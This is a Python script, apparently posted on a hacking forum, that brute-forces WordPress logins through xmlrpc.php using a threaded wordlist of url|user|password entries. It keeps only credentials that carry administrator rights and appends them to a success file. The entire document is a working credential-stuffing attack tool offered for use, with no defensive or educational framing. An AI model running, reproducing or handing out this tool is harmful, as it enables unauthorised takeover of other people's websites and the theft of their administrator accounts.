wordlist type:
url.tld/wp-login.php|admin|admin
Counts only users with administrative privileges as hits.
url.tld/wp-login.php|admin|admin
Counts only users with administrative privileges as hits.
Python:
import requests
import json
from urllib.parse import urlparse
import math
import xml.etree.ElementTree as ET
import threading
import time
import argparse
def wpXMLbrute(line):
url = line.split("|")[0]
username = line.split("|")[1]
password = line.split("|")[2]
url = url.replace("wp-login.php", "xmlrpc.php")
data = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{}</value>
</param>
<param>
<value>{}</value>
</param>
</params>
</methodCall>""".format(username, password)
headers = {'Content-Type': 'text/xml'}
try:
r = requests.post(url, data=data, headers=headers, timeout=7)
if r.status_code == 200:
if r.text.find("<?xml") == -1:
print("Failed")
return
root = ET.fromstring(r.text)
for child in root.iter('member'):
if child.find('name').text == "isAdmin":
if child.find('value').find('boolean').text == "1":
print("Success")
with open("success.txt", "a") as f:
f.write(line)
break
else:
print("Failed")
except:
print("Failed")
pass
def multi(thread, list):
with open(list, "r", encoding='cp437') as f:
for line in f:
t = threading.Thread(target=wpXMLbrute, args=(line,))
t.start()
while threading.active_count() > thread:
time.sleep(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--thread", help="Thread", type=int)
parser.add_argument("-l", "--list", help="List", type=str)
args = parser.parse_args()
if args.thread == None or args.list == None:
print("Usage: python3 main.py -t 10 -l list.txt")
print("xss.pro / @elvira")
exit()
else:
multi(args.thread, args.list)
